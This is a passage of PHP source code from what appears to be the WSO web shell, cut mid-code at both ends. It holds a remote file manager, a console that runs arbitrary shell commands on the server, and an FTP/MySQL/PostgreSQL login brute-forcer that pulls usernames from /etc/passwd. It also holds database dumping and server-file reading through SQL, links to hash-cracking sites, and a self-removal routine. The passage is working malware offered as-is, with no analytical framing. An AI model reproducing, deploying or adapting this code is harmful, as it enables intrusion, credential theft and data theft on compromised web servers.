elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\n $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\n elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i]))\n $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\n }\n $GLOBALS[\'sort\'] = $sort;\n function wsoCmp($a, $b) {\n if($GLOBALS[\'sort\'][0] != \'size\')\n return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\n else\n return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\n }\n usort($files, "wsoCmp");\n usort($dirs, "wsoCmp");\n $files = array_merge($dirs, $files);\n $l = 0;\n foreach($files as $f) {\n echo \'<tr\'.($l?\' class=l_one_area\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'ff_tools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'ff_man\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'ff_tools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\n .\'</td><td><a href="#" onclick="g(\\\'ff_tools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'ff_tools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'ff_tools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'ff_tools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\n $l = $l?0:1;\n }\n echo "<tr><td colspan=7>\n\t\t<input type=hidden name=a value=\'ff_man\'>\n\t\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\n\t\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\n\t\t<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\n if(class_exists(\'ZipArchive\'))\n echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>";\n echo "<option value=\'tar\'>Compress (tar.gz)</option>";\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\n echo "<option value=\'paste\'>Paste / Compress</option>";\n echo "</select> ";\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\n echo "file name: <input type=text name=p2 value=\'wso_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> ";\n echo "<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>";\n wsoFooter();\n }\n\n function actionStringTools() {\n if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\n if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}\n if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}\n if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\n $stringTools = array(\n \'Base64 encode\' => \'base64_encode\',\n \'Base64 decode\' => \'base64_decode\',\n \'Url encode\' => \'urlencode\',\n \'Url decode\' => \'urldecode\',\n \'Full urlencode\' => \'full_urlencode\',\n \'md5 hash\' => \'md5\',\n \'sha1 hash\' => \'sha1\',\n \'crypt\' => \'crypt\',\n \'CRC32\' => \'crc32\',\n \'ASCII to HEX\' => \'ascii2hex\',\n \'HEX to ASCII\' => \'hex2ascii\',\n \'HEX to DEC\' => \'hexdec\',\n \'HEX to BIN\' => \'hex2bin\',\n \'DEC to HEX\' => \'dechex\',\n \'DEC to BIN\' => \'decbin\',\n \'BIN to HEX\' => \'binhex\',\n \'BIN to DEC\' => \'bindec\',\n \'String to lower case\' => \'strtolower\',\n \'String to upper case\' => \'strtoupper\',\n \'Htmlspecialchars\' => \'htmlspecialchars\',\n \'String length\' => \'strlen\',\n );\n if(isset($_POST[\'ajax\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\n ob_start();\n if(in_array($_POST[\'p1\'], $stringTools))\n echo $_POST[\'p1\']($_POST[\'p2\']);\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\n echo strlen($temp), "\\n", $temp;\n exit;\n }\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\n wsoHeader();\n echo \'<h1>String conversions</h1><div class=content>\';\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>";\n foreach($stringTools as $k => $v)\n echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=area_main>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml_one_area\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";\n if(!empty($_POST[\'p1\'])) {\n if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\n }\n echo"</pre></div><br><h1>Search files:</h1><div class=content>\n\t\t\t<form onsubmit=\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>\n\t\t\t\t<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>\n\t\t\t\t<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>\n\t\t\t\t<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>\n\t\t\t\t<tr><td></td><td><input type=\'submit\' value=\'>>\'></td></tr>\n\t\t\t\t</table></form>";\n\n function wsoRecursiveGlob($path) {\n if(substr($path, -1) != \'/\')\n $path.=\'/\';\n $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\n if(is_array($paths)&&@count($paths)) {\n foreach($paths as $item) {\n if(@is_dir($item)){\n if($path!=$item)\n wsoRecursiveGlob($item);\n } else {\n if(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false)\n echo "<a href=\'#\' onclick=\'g(\\"ff_tools\\",null,\\"".urlencode($item)."\\", \\"view\\",\\"\\")\'>".htmlspecialchars($item)."</a><br>";\n }\n }\n }\n }\n if(@$_POST[\'p3\'])\n wsoRecursiveGlob($_POST[\'c\']);\n echo "</div><br><h1>Search for hash:</h1><div class=content>\n\t\t\t<form method=\'post\' target=\'_blank\' name=\'hf\'>\n\t\t\t\t<input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>\n\t <input type=\'hidden\' name=\'act\' value=\'find\'/>\n\t\t\t\t<input type=\'button\' value=\'hashcracking.ru\' onclick=\\"document.hf.action=\'https://hashcracking.ru/index.php\';document.hf.submit()\\"><br>\n\t\t\t\t<input type=\'button\' value=\'md5.rednoize.com\' onclick=\\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\\"><br>\n\t <input type=\'button\' value=\'crackfor.me\' onclick=\\"document.hf.action=\'http://crackfor.me/index.php\';document.hf.submit()\\"><br>\n\t\t\t</form></div>";\n wsoFooter();\n }\n\n function actionff_tools() {\n if( isset($_POST[\'p1\']) )\n $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\n if(@$_POST[\'p2\']==\'download\') {\n if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\n ob_start("ob_gzhandler", 4096);\n header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\n if (function_exists("mime_content_type")) {\n $type = @mime_content_type($_POST[\'p1\']);\n header("Content-Type: " . $type);\n } else\n header("Content-Type: application/octet-stream");\n $fp = @fopen($_POST[\'p1\'], "r");\n if($fp) {\n while(!@feof($fp))\n echo @fread($fp, 1024);\n fclose($fp);\n }\n }exit;\n }\n if( @$_POST[\'p2\'] == \'mkfile\' ) {\n if(!file_exists($_POST[\'p1\'])) {\n $fp = @fopen($_POST[\'p1\'], \'w\');\n if($fp) {\n $_POST[\'p2\'] = "edit";\n fclose($fp);\n }\n }\n }\n wsoHeader();\n echo \'<h1>File tools</h1><div class=content>\';\n if( !file_exists(@$_POST[\'p1\']) ) {\n echo \'File not exists\';\n wsoFooter();\n return;\n }\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\n if(!$uid) {\n $uid[\'name\'] = @fileowner($_POST[\'p1\']);\n $gid[\'name\'] = @filegroup($_POST[\'p1\']);\n } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\n echo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\n echo \'<span>Change time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\n if( empty($_POST[\'p2\']) )\n $_POST[\'p2\'] = \'view\';\n if( is_file($_POST[\'p1\']) )\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\n else\n $m = array(\'Chmod\', \'Rename\', \'Touch\');\n foreach($m as $v)\n echo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\n echo \'<br><br>\';\n switch($_POST[\'p2\']) {\n case \'view\':\n echo \'<pre class=ml_one_area>\';\n $fp = @fopen($_POST[\'p1\'], \'r\');\n if($fp) {\n while( !@feof($fp) )\n echo htmlspecialchars(@fread($fp, 1024));\n @fclose($fp);\n }\n echo \'</pre>\';\n break;\n case \'highlight\':\n if( @is_readable($_POST[\'p1\']) ) {\n echo \'<div class=ml_one_area style="background-color: #e1e1e1;color:black;">\';\n $code = @highlight_file($_POST[\'p1\'],true);\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\n }\n break;\n case \'chmod\':\n if( !empty($_POST[\'p3\']) ) {\n $perms = 0;\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\n if(!@chmod($_POST[\'p1\'], $perms))\n echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\n }\n clearstatcache();\n echo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\n break;\n case \'edit\':\n if( !is_writable($_POST[\'p1\'])) {\n echo \'File isn\\\'t wr-le\';\n break;\n }\n if( !empty($_POST[\'p3\']) ) {\n $time = @filemtime($_POST[\'p1\']);\n $_POST[\'p3\'] = substr($_POST[\'p3\'],1);\n $fp = @fopen($_POST[\'p1\'],"w");\n if($fp) {\n @fwrite($fp,$_POST[\'p3\']);\n @fclose($fp);\n echo \'Saved!<br><script>p3_="";</script>\';\n @touch($_POST[\'p1\'],$time,$time);\n }\n }\n echo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=area_main>\';\n $fp = @fopen($_POST[\'p1\'], \'r\');\n if($fp) {\n while( !@feof($fp) )\n echo htmlspecialchars(@fread($fp, 1024));\n @fclose($fp);\n }\n echo \'</textarea><input type=submit value=">>"></form>\';\n break;\n case \'hexdump\':\n $c = @file_get_contents($_POST[\'p1\']);\n $n = 0;\n $h = array(\'00000000<br>\',\'\',\'\');\n $len = strlen($c);\n for ($i=0; $i<$len; ++$i) {\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\n switch ( ord($c[$i]) ) {\n case 0: $h[2] .= \' \'; break;\n case 9: $h[2] .= \' \'; break;\n case 10: $h[2] .= \' \'; break;\n case 13: $h[2] .= \' \'; break;\n default: $h[2] .= $c[$i]; break;\n }\n $n++;\n if ($n == 32) {\n $n = 0;\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\n $h[1] .= \'<br>\';\n $h[2] .= "\\n";\n }\n }\n echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\n break;\n case \'rename\':\n if( !empty($_POST[\'p3\']) ) {\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\n echo \'Can\\\'t rename!<br>\';\n else\n die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\n }\n echo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\n break;\n case \'touch\':\n if( !empty($_POST[\'p3\']) ) {\n $time = strtotime($_POST[\'p3\']);\n if($time) {\n if(!touch($_POST[\'p1\'],$time,$time))\n echo \'Fail!\';\n else\n echo \'Touched!\';\n } else echo \'Bad time format!\';\n }\n clearstatcache();\n echo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\n break;\n }\n echo \'</div>\';\n wsoFooter();\n }\n\n function actionConsole() {\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\n $_POST[\'p1\'] .= \' 2>&1\';\n } elseif(!empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\n\n if(isset($_POST[\'ajax\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\n ob_start();\n echo "d.cf.cmd.value=\'\';\\n";\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\n if(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\n if(@chdir($match[1])) {\n $GLOBALS[\'cwd\'] = @getcwd();\n echo "c_=\'".$GLOBALS[\'cwd\']."\';";\n }\n }\n echo "d.cf.output.value+=\'".$temp."\';";\n echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\n $temp = ob_get_clean();\n echo strlen($temp), "\\n", $temp;\n exit;\n }\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\n wsoHeader();\n echo "<script>\n\tif(window.Event) window.captureEvents(Event.KEYDOWN);\n\tvar cmds = new Array(\'\');\n\tvar cur = 0;\n\tfunction kp(e) {\n\t\tvar n = (window.Event) ? e.which : e.keyCode;\n\t\tif(n == 38) {\n\t\t\tcur--;\n\t\t\tif(cur>=0)\n\t\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\t\telse\n\t\t\t\tcur++;\n\t\t} else if(n == 40) {\n\t\t\tcur++;\n\t\t\tif(cur < cmds.length)\n\t\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\t\telse\n\t\t\t\tcur--;\n\t\t}\n\t}\n\tfunction add(cmd) {\n\t\tcmds.pop();\n\t\tcmds.push(cmd);\n\t\tcmds.push(\'\');\n\t\tcur = cmds.length-1;\n\t}\n\t</script>";\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;"><select name=alias>\';\n foreach($GLOBALS[\'aliases\'] as $n => $v) {\n if($v == \'\') {\n echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\n continue;\n }\n echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\n }\n\n echo \'</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=area_main name=output style="border-bottom:0;margin:0;" readonly>\';\n if(!empty($_POST[\'p1\'])) {\n echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']));\n }\n echo \'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\n echo \'</form></div><script>d.cf.cmd.focus();</script>\';\n wsoFooter();\n }\n\n function actionLogout() {\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\n die(\'bye!\');\n }\n\n function actionSelfRemove() {\n\n if($_POST[\'p1\'] == \'yes\')\n if(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\n die(\'Shell has been removed\');\n else\n echo \'unlink error!\';\n if($_POST[\'p1\'] != \'yes\')\n wsoHeader();\n echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\n wsoFooter();\n }\n\n function actionBruteforce() {\n wsoHeader();\n if( isset($_POST[\'proto\']) ) {\n echo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';\n if( $_POST[\'proto\'] == \'ftp\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $fp = @ftp_connect($ip, $port?$port:21);\n if(!$fp) return false;\n $res = @ftp_login($fp, $login, $pass);\n @ftp_close($fp);\n return $res;\n }\n } elseif( $_POST[\'proto\'] == \'mysql\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\n @mysql_close($res);\n return $res;\n }\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\n $res = @pg_connect($str);\n @pg_close($res);\n return $res;\n }\n }\n $success = 0;\n $attempts = 0;\n $server = explode(":", $_POST[\'server\']);\n if($_POST[\'type\'] == 1) {\n $temp = @file(\'/etc/passwd\');\n if( is_array($temp) )\n foreach($temp as $line) {\n $line = explode(":", $line);\n ++$attempts;\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\n $success++;\n echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';\n }\n if(@$_POST[\'reverse\']) {\n $tmp = "";\n for($i=strlen($line[0])-1; $i>=0; --$i)\n $tmp .= $line[0][$i];\n ++$attempts;\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\n $success++;\n echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);\n }\n }\n }\n } elseif($_POST[\'type\'] == 2) {\n $temp = @file($_POST[\'dict\']);\n if( is_array($temp) )\n foreach($temp as $line) {\n $line = trim($line);\n ++$attempts;\n if( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\n $success++;\n echo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';\n }\n }\n }\n echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";\n }\n echo \'<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'\n .\'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>\'\n .\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\'\n .\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\'\n .\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\'\n .\'<span>Server:port</span></td>\'\n .\'<td><input type=text name=server value="127.0.0.1"></td></tr>\'\n .\'<tr><td><span>Brute type</span></td>\'\n .\'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>\'\n .\'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>\'\n .\'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>\'\n .\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\'\n .\'<td><input type=text name=login value="root"></td></tr>\'\n .\'<tr><td><span>Dictionary</span></td>\'\n .\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\'\n .\'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\';\n echo \'</div><br>\';\n wsoFooter();\n }\n\n function actionSql() {\n class DbClass {\n var $type;\n var $link;\n var $res;\n function __construct($type)\t{\n $this->type = $type;\n }\n function connect($host, $user, $pass, $dbname){\n switch($this->type)\t{\n case \'mysql\':\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\n break;\n case \'pgsql\':\n $host = explode(\':\', $host);\n if(!$host[1]) $host[1]=5432;\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\n break;\n }\n return false;\n }\n function selectdb($db) {\n switch($this->type)\t{\n case \'mysql\':\n if (@mysql_select_db($db))return true;\n break;\n }\n return false;\n }\n function query($str) {\n switch($this->type) {\n case \'mysql\':\n return $this->res = @mysql_query($str);\n break;\n case \'pgsql\':\n return $this->res = @pg_query($this->link,$str);\n break;\n }\n return false;\n }\n function fetch() {\n $res = func_num_args()?func_get_arg(0):$this->res;\n switch($this->type)\t{\n case \'mysql\':\n return @mysql_fetch_assoc($res);\n break;\n case \'pgsql\':\n return @pg_fetch_assoc($res);\n break;\n }\n return false;\n }\n function listDbs() {\n switch($this->type)\t{\n case \'mysql\':\n return $this->query("SHOW databases");\n break;\n case \'pgsql\':\n return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\n break;\n }\n return false;\n }\n function listTables() {\n switch($this->type)\t{\n case \'mysql\':\n return $this->res = $this->query(\'SHOW TABLES\');\n break;\n case \'pgsql\':\n return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\n break;\n }\n return false;\n }\n function error() {\n switch($this->type)\t{\n case \'mysql\':\n return @mysql_error();\n break;\n case \'pgsql\':\n return @pg_last_error();\n break;\n }\n return false;\n }\n function setCharset($str) {\n switch($this->type)\t{\n case \'mysql\':\n if(function_exists(\'mysql_set_charset\'))\n return @mysql_set_charset($str, $this->link);\n else\n $this->query(\'SET CHARSET \'.$str);\n break;\n case \'pgsql\':\n return @pg_set_client_encoding($this->link, $str);\n break;\n }\n return false;\n }\n function loadFile($str) {\n switch($this->type)\t{\n case \'mysql\':\n return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\n break;\n case \'pgsql\':\n $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");\n $r=array();\n while($i=$this->fetch())\n $r[] = $i[\'file\'];\n $this->query(\'drop table wso2\');\n return array(\'file\'=>implode("\\n",$r));\n break;\n }\n return false;\n }\n function dump($table, $fp = false) {\n switch($this->type)\t{\n case \'mysql\':\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\n $create = mysql_fetch_array($res);\n $sql = $create[1].";\\n";\n if($fp) fwrite($fp, $sql); else echo($sql);\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\n $i = 0;\n $head = true;\n while($item = $this->fetch()) {\n $sql = \'\';\n if($i % 1000 == 0) {\n $head = true;\n $sql = ";\\n\\n";\n }\n\n $columns = array();\n foreach($item as $k=>$v) {\n if($v === null)\n $item[$k] = "NULL";\n elseif(is_int($v))\n $item[$k] = $v;\n else\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\n $columns[] = "`".$k."`";\n }\n if($head) {\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\n $head = false;\n } else\n $sql .= "\\n\\t,(".implode(", ", $item).\')\';\n if($fp) fwrite($fp, $sql); else echo($sql);\n $i++;\n }\n if(!$head)\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\n break;\n case \'pgsql\':\n $this->query(\'SELECT * FROM \'.$table);\n while($item = $this->fetch()) {\n $columns = array();\n foreach($item as $k=>$v) {\n $item[$k] = "\'".addslashes($v)."\'";\n $columns[] = $k;\n }\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\n if($fp) fwrite($fp, $sql); else echo($sql);\n }\n break;\n }\n return false;\n }\n };\n $db = new DbClass($_POST[\'type\']);\n if((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\n $db->selectdb($_POST[\'sql_base\']);\n switch($_POST[\'charset\']) {\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\n case "UTF-8": $db->setCharset(\'utf8\'); break;\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\n case "cp866": $db->setCharset(\'cp866\'); break;\n }\n if(empty($_POST[\'file\'])) {\n ob_start("ob_gzhandler", 4096);\n header("Content-Disposition: attachment; filename=dump.sql");\n header("Content-Type: text/plain");\n foreach($_POST[\'tbl\'] as $v)\n $db->dump($v);\n exit;\n } elseif($fp = 